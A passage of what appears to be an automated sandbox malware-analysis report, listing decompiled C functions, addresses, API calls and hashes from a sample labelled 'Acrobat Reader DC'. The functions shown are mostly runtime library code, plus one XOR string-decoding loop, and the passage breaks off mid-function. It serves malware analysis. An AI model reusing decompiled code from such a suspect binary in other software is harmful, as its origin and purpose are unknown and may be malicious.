                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411682 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00411682(int _a4) {

				E00411657(_a4);
				ExitProcess(_a4);
			}



                                  0x0041168a
                                  0x00411693

                                  APIs
                                  • ___crtCorExitProcess.LIBCMT ref: 0041168A
                                    • Part of subcall function 00411657: GetModuleHandleW.KERNEL32(mscoree.dll,?,0041168F,004115F6,?,0041823B,000000FF,0000001E,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D), ref: 00411661
                                    • Part of subcall function 00411657: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00411671
                                  • ExitProcess.KERNEL32 ref: 00411693
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                  • String ID:
                                  • API String ID: 2427264223-0
                                  • Opcode ID: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction ID: f47d9122093ed6489770cc06aed7b78ba16bb349dce56bb799ac8566cdeb1789
                                  • Opcode Fuzzy Hash: 176e26db055b62aeaf9cf92000a80230bc536f1d50f5b4dae20e080cb65f91b1
                                  • Instruction Fuzzy Hash: 56B09B310001487BCB052F16DD0D84D3F15DB413907544029F91905031DF779D919688
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E00402780(intOrPtr* __eax, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t40;
				signed int _t41;
				intOrPtr _t44;
				intOrPtr* _t50;
				signed int _t51;
				signed short _t52;
				signed int _t53;
				intOrPtr* _t55;
				signed int _t56;
				intOrPtr* _t57;
				intOrPtr* _t58;
				intOrPtr* _t59;
				void* _t77;
				intOrPtr _t78;
				signed int _t79;
				intOrPtr* _t80;
				void* _t83;

				_t77 = __edi;
				_t57 = __eax;
				_t1 = _t77 + 0xc; // 0x43
				_t40 =  *_t1;
				_push(_t78);
				_t86 =  *((intOrPtr*)(__edi + 8)) - _t40;
				if( *((intOrPtr*)(__edi + 8)) == _t40) {
					_t41 = _t40 + _t40;
					 *(__edi + 0xc) = _t41;
					__eflags = _t41 - 4;
					if(__eflags < 0) {
						_t79 = 4;
					} else {
						_t79 = _t41;
					}
					 *(_t77 + 0xc) = _t79;
					_push( ~(0 | __eflags > 0x00000000) | _t79 * 0x00000004);
					_t44 = E004115D7(_t77, _t79, __eflags);
					_t33 = _t77 + 4; // 0x444ad7
					_t78 = _t44;
					_t34 = _t77 + 8; // 0x530041
					E00410E60(_t78,  *_t33,  *_t34 +  *_t34 +  *_t34 +  *_t34);
					_t35 = _t77 + 4; // 0x444ad7
					_push( *_t35);
					E004111DC();
					_t83 = _t83 + 0x14;
					 *((intOrPtr*)(_t77 + 4)) = _t78;
				}
				_push(0xc); // executed
				_t50 = E004115D7(_t77, _t78, _t86); // executed
				if(_t50 == 0) {
					_t80 = 0;
					goto L6;
				} else {
					_t80 = _t50;
					_t52 =  *((intOrPtr*)(_t57 + 8));
					 *(_t80 + 8) = _t52;
					_t53 = _t52 & 0x0000ffff;
					 *((short*)(_t80 + 0xa)) =  *((intOrPtr*)(_t57 + 0xa));
					if(_t53 <= 0x3f) {
						__eflags = _t53 - 0x30;
						if(__eflags < 0) {
							goto L3;
						} else {
							_push(0x10); // executed
							_t55 = E004115D7(_t77, _t80, __eflags); // executed
							__eflags = _t55;
							if(_t55 == 0) {
								_t55 = 0;
							} else {
								_t58 =  *_t57;
								 *_t55 =  *_t58;
								 *((intOrPtr*)(_t55 + 4)) =  *((intOrPtr*)(_t58 + 4));
								 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t58 + 8));
								_t59 =  *((intOrPtr*)(_t58 + 0xc));
								 *((intOrPtr*)(_t55 + 0xc)) = _t59;
								 *_t59 =  *_t59 + 1;
								__eflags =  *_t59;
							}
							 *_t80 = _t55;
							_t19 = _t77 + 8; // 0x530041
							_t56 =  *_t19;
							_t20 = _t77 + 4; // 0x444ad7
							 *((intOrPtr*)( *_t20 + _t56 * 4)) = _t80;
							_t23 = _t77 + 8;
							 *_t23 =  *(_t77 + 8) + 1;
							__eflags =  *_t23;
							return _t56;
						}
					} else {
						L3:
						if(_t53 == 0x10) {
							 *_t80 =  *_t57;
							 *((intOrPtr*)(_t80 + 4)) =  *((intOrPtr*)(_t57 + 4));
						} else {
							if(_t53 == 0x20) {
								 *_t80 =  *_t57;
							} else {
								 *_t80 =  *_t57;
							}
						}
						L6:
						_t7 = _t77 + 8; // 0x530041
						_t51 =  *_t7;
						_t8 = _t77 + 4; // 0x444ad7
						 *((intOrPtr*)( *_t8 + _t51 * 4)) = _t80;
						 *(_t77 + 8) =  *(_t77 + 8) + 1;
						return _t51;
					}
				}
			}





















                                  0x00402780
                                  0x00402781
                                  0x00402783
                                  0x00402783
                                  0x00402786
                                  0x00402787
                                  0x0040278a
                                  0x00402827
                                  0x00402829
                                  0x0040282c
                                  0x0040282f
                                  0x00402876
                                  0x00402831
                                  0x00402831
                                  0x00402831
                                  0x00402841
                                  0x00402848
                                  0x00402849
                                  0x0040284e
                                  0x00402851
                                  0x00402853
                                  0x0040285d
                                  0x00402862
                                  0x00402865
                                  0x00402866
                                  0x0040286b
                                  0x0040286e
                                  0x0040286e
                                  0x00402790
                                  0x00402792
                                  0x0040279c
                                  0x00426845
                                  0x00000000
                                  0x004027a2
                                  0x004027a2
                                  0x004027a4
                                  0x004027a8
                                  0x004027b0
                                  0x004027b3
                                  0x004027bb
                                  0x004027e4
                                  0x004027e8
                                  0x00000000
                                  0x004027ea
                                  0x004027ea
                                  0x004027ec
                                  0x004027f4
                                  0x004027f6
                                  0x00426826
                                  0x004027fc
                                  0x004027fc
                                  0x00402800
                                  0x00402805
                                  0x0040280b
                                  0x0040280e
                                  0x00402811
                                  0x00402814
                                  0x00402814
                                  0x00402814
                                  0x00402816
                                  0x00402818
                                  0x00402818
                                  0x0040281b
                                  0x0040281e
                                  0x00402821
                                  0x00402821
                                  0x00402821
                                  0x00402826
                                  0x00402826
                                  0x004027bd
                                  0x004027bd
                                  0x004027c1
                                  0x0042682f
                                  0x00426834
                                  0x004027c7
                                  0x004027cb
                                  0x0042683e
                                  0x004027d1
                                  0x004027d3
                                  0x004027d3
                                  0x004027cb
                                  0x004027d5
                                  0x004027d5
                                  0x004027d5
                                  0x004027d8
                                  0x004027db
                                  0x004027de
                                  0x004027e3
                                  0x004027e3
                                  0x004027bb

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID:
                                  • API String ID: 4104443479-0
                                  • Opcode ID: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                  • Opcode Fuzzy Hash: 5787e8657e79955fb28a38bf335b6d7571070b1586e9a7fa06b155a48d50d078
                                  • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F760 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0040F760(signed int __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4) {
				char _v268;
				char _v412;
				char _v428;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t29;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t36;
				void* _t40;
				intOrPtr _t42;
				void* _t51;
				signed int _t53;
				signed int _t58;
				signed int _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				signed int _t67;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t75;

				_t75 = __eflags;
				_push(_t62);
				_t63 = E0040F6F0(0x484ea8, __ecx | 0xffffffff, _t62);
				E00413650( &_v268, _t63);
				_push(_t63);
				E004111DC();
				_t70 = (_t67 & 0xfffffff8) - 0x1a8 + 0xc;
				_t64 =  &_v412;
				E0040F820( &_v412);
				E0040F850( &_v268,  &_v412, _t75);
				 *(__edi + 8) = 0;
				_t51 = 0;
				_t29 = 0;
				do {
					_t32 = _t29 + ( *(_t70 + _t51 + 0x18) & 0x000000ff) + ( *(_t70 + _t51 + 0x19) & 0x000000ff) + ( *(_t70 + _t51 + 0x1a) & 0x000000ff);
					_t58 =  *(_t70 + _t51 + 0x1b) & 0x000000ff;
					_t51 = _t51 + 4;
					_t29 = _t32 + _t58;
				} while (_t51 < 0x10);
				 *(__edi + 8) = _t29;
				_t34 = E004149C2(_a4, L"rb"); // executed
				_t71 = _t70 + 8;
				 *__edi = _t34;
				if(_t34 == 0) {
					_t35 = 1;
				} else {
					_t36 = E0040F5C0(__edi); // executed
					_t79 = _t36;
					if(_t36 == 0) {
						E00414D04( &_v428, 1, 0x10,  *__edi);
						_t72 = _t71 + 0x10;
						E0044AFEF( &_v428, __eflags,  &_v428, 0x10, 0x99f2);
						_t40 = 0;
						 *(__edi + 8) = 0;
						_t53 = 0;
						__eflags = 0;
						do {
							_t60 =  *(_t72 + _t40 + 8) & 0x000000ff;
							_t40 = _t40 + 1;
							_t53 = _t53 * _t60;
							__eflags = _t40 - 0x10;
						} while (__eflags < 0);
						_push( *__edi);
						 *(__edi + 8) = _t53;
						_t42 = E00414FE2(0, _t60, __edi, _t64, __eflags); // executed
						 *((intOrPtr*)(__edi + 4)) = _t42;
						_t35 = 0;
					} else {
						_push( *__edi);
						_t66 = _t36;
						E00414A46(0, _t58, __edi, _t66, _t79);
						_t35 = _t66;
					}
				}
				return _t35;
			}




























                                  0x0040f760
                                  0x0040f76d
                                  0x0040f77b
                                  0x0040f786
                                  0x0040f78b
                                  0x0040f78c
                                  0x0040f791
                                  0x0040f794
                                  0x0040f798
                                  0x0040f7a6
                                  0x0040f7ad
                                  0x0040f7b0
                                  0x0040f7b2
                                  0x0040f7b4
                                  0x0040f7c7
                                  0x0040f7c9
                                  0x0040f7ce
                                  0x0040f7d1
                                  0x0040f7d3
                                  0x0040f7d8
                                  0x0040f7e4
                                  0x0040f7e9
                                  0x0040f7ec
                                  0x0040f7f0
                                  0x00427c2a
                                  0x0040f7f6
                                  0x0040f7f7
                                  0x0040f7fc
                                  0x0040f7fe
                                  0x00427c40
                                  0x00427c45
                                  0x00427c54
                                  0x00427c59
                                  0x00427c5b
                                  0x00427c5e
                                  0x00427c5e
                                  0x00427c60
                                  0x00427c60
                                  0x00427c65
                                  0x00427c66
                                  0x00427c69
                                  0x00427c69
                                  0x00427c70
                                  0x00427c71
                                  0x00427c74
                                  0x00427c7c
                                  0x00427c7f
                                  0x0040f804
                                  0x0040f806
                                  0x0040f807
                                  0x0040f809
                                  0x0040f811
                                  0x0040f811
                                  0x0040f7fe
                                  0x0040f818

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                                  • String ID:
                                  • API String ID: 3898977315-0
                                  • Opcode ID: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                  • Opcode Fuzzy Hash: bd970487722ed412f8effd1999deb2f338760f6f87b849b930bc41062b4911b2
                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0046F3C1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0046F3C1(void* __ecx, void* __fp0, struct HWND__* _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t25;
				struct HWND__* _t26;
				void* _t27;
				struct HWND__* _t32;

				_t27 = __ecx;
				_t32 = _a4;
				_t35 = _t32 + 0x2e0;
				E004109E0(_t11, _t32 + 0x2e0);
				_t25 = _t32 + 0x1b8;
				_t13 = E004426BB(_t25);
				_push(_t25);
				if(_t13 == 0) {
					_t14 = E00443833();
					__eflags = _t14;
					if(_t14 == 0) {
						goto L3;
					} else {
						_t17 = E004533EB(_t25);
						_t33 = _t32 + 0x1d8;
						__eflags = _t32 + 0x1d8;
						_t18 = E0046ED8E(_t32 + 0x1d8, __fp0, _t33, _t17, _t32 + 0x1c8, _t35,  *((intOrPtr*)(_t32 + 0x2d4)),  *(_t32 + 0x2dd) & 0x000000ff,  *(_t32 + 0x2dc) & 0x000000ff, _a8); // executed
						return _t18;
					}
				} else {
					_t26 = E0044B3AC();
					_a4 = _t26;
					if(IsWindow(_t26) == 0) {
						L3:
						__eflags = 0;
						return 0;
					} else {
						E0044CDAF(_t27, _t32 + 0x1d8, _t32 + 0x1d8, _t26);
						E00436299(_t35,  &_a4);
						return 1;
					}
				}
			}














                                  0x0046f3c1
                                  0x0046f3c7
                                  0x0046f3ca
                                  0x0046f3d0
                                  0x0046f3d5
                                  0x0046f3dc
                                  0x0046f3e1
                                  0x0046f3e4
                                  0x0046f427
                                  0x0046f42c
                                  0x0046f42e
                                  0x00000000
                                  0x0046f430
                                  0x0046f454
                                  0x0046f45a
                                  0x0046f45a
                                  0x0046f461
                                  0x0046f46a
                                  0x0046f46a
                                  0x0046f3e6
                                  0x0046f3eb
                                  0x0046f3ee
                                  0x0046f3f9
                                  0x0046f41e
                                  0x0046f41e
                                  0x0046f424
                                  0x0046f3fb
                                  0x0046f403
                                  0x0046f40d
                                  0x0046f41b
                                  0x0046f41b
                                  0x0046f3f9

                                  APIs
                                  • IsWindow.USER32(00000000), ref: 0046F3F1
                                    • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window_memmove
                                  • String ID:
                                  • API String ID: 517827167-0
                                  • Opcode ID: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction ID: bb29974ae8a0ca66dd60d7796f545a3f68a626f1234de100ca197a45a268520a
                                  • Opcode Fuzzy Hash: 9fbfc9f8aed1688e47d472757497f7b005165081132f4017b987863961a9c52e
                                  • Instruction Fuzzy Hash: 5111CEB22001157AE200AAA6EC80DFBF75CEBD0365F04413BFD0892102DB39A95983B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F677 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0041F677(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x496e6c, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x496e68;
					if( *0x496e68 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00411988(_t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00417F77(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










                                  0x0041f67c
                                  0x0041f681
                                  0x0041f69e
                                  0x0041f6a3
                                  0x0041f6a5
                                  0x0041f6a7
                                  0x0041f6a9
                                  0x0041f6a9
                                  0x0041f6a9
                                  0x00000000
                                  0x0041f6b1
                                  0x0041f6ba
                                  0x0041f6c0
                                  0x0041f6c2
                                  0x00000000
                                  0x00000000
                                  0x0041f6f6
                                  0x0041f6f8
                                  0x00000000
                                  0x0041f6c4
                                  0x0041f6c4
                                  0x0041f6cb
                                  0x0041f6e9
                                  0x0041f6ec
                                  0x0041f6ee
                                  0x0041f6f0
                                  0x0041f6f0
                                  0x0041f6cd
                                  0x0041f6ce
                                  0x0041f6d4
                                  0x0041f6d6
                                  0x0041f6aa
                                  0x0041f6aa
                                  0x0041f6ac
                                  0x0041f6af
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041f6d8
                                  0x0041f6d8
                                  0x0041f6db
                                  0x0041f6dd
                                  0x0041f6df
                                  0x0041f6df
                                  0x0041f6e5
                                  0x0041f6e5
                                  0x0041f6d6
                                  0x00000000
                                  0x0041f683
                                  0x0041f687
                                  0x0041f68a
                                  0x0041f68d
                                  0x00000000
                                  0x0041f68f
                                  0x0041f694
                                  0x0041f69d
                                  0x0041f69d
                                  0x0041f68d
                                  0x00000000

                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00416B5F,004115F6,?,00000000,00000000,00000000,?,00417A1B,00000001,00000214,?,004115F6), ref: 0041F6BA
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap__getptd_noexit
                                  • String ID:
                                  • API String ID: 328603210-0
                                  • Opcode ID: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction ID: b12b70d0c6160b5ee631c5b95a8e6af17588d2488de0a25e1c35044c814a7025
                                  • Opcode Fuzzy Hash: b303a5dab890f8841b70c8dc9e02e5bbf0853f8a352e43766576194431ea4f93
                                  • Instruction Fuzzy Hash: FB01B1352002159BEB249F35DC14BEB3354AB91764F15453BE815CA2B0DB788C87C768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444AF8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00444AF8(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* __edi;
				void* __esi;
				void* _t23;
				void* _t28;
				signed int _t29;
				void* _t31;
				signed short _t41;
				intOrPtr* _t42;

				_t42 = _a8;
				_t3 =  *_t42 + 4; // 0x4
				_t41 =  *( *_t42 + _a4);
				 *_t42 = _t3;
				_t5 = _t41 + 1; // 0x485a85
				_push( ~(0 | __eflags > 0x00000000) | _t5 * 0x00000002); // executed
				_t23 = E004115D7(_t41, _t42, __eflags); // executed
				_t31 = _t23;
				E00410E60(_t31,  *_t42 + _a4, _t41 + _t41);
				_t28 = _t41 + _t41;
				 *_t42 =  *_t42 + _t28;
				 *((short*)(_t28 + _t31)) = 0;
				_t29 = 0;
				if(_t41 > 0) {
					do {
						 *(_t31 + _t29 * 2) =  *(_t31 + _t29 * 2) ^ _t41;
						_t29 = _t29 + 1;
					} while (_t29 < _t41);
				}
				return _t31;
			}











                                  0x00444b00
                                  0x00444b05
                                  0x00444b09
                                  0x00444b0c
                                  0x00444b10
                                  0x00444b21
                                  0x00444b22
                                  0x00444b27
                                  0x00444b34
                                  0x00444b39
                                  0x00444b3c
                                  0x00444b40
                                  0x00444b47
                                  0x00444b4b
                                  0x00444b4d
                                  0x00444b4d
                                  0x00444b51
                                  0x00444b52
                                  0x00444b4d
                                  0x00444b5c

                                  APIs
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00444B34
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc_memmove
                                  • String ID:
                                  • API String ID: 1183979061-0
                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004118DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E004118DA(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0041179A(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










                                  0x004118df
                                  0x004118e1
                                  0x004118e3
                                  0x004118e6
                                  0x004118ef

                                  APIs
                                  • _doexit.LIBCMT ref: 004118E6
                                    • Part of subcall function 0041179A: __lock.LIBCMT ref: 004117A8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __lock_doexit
                                  • String ID:
                                  • API String ID: 368792745-0
                                  • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction ID: 5a17ee954bf67223b14f28cd02c2113b96eab5bc454a4982446cab3363f3b6fe
                                  • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                  • Instruction Fuzzy Hash: 0DB0923258020C33DA202652AC03F563A0A87C0B64F240021BA1C1D2E1A9A2A9A58089
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E004149C2(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t10;

				_push(0x40);
				_push(_a8);
				_push(_a4);
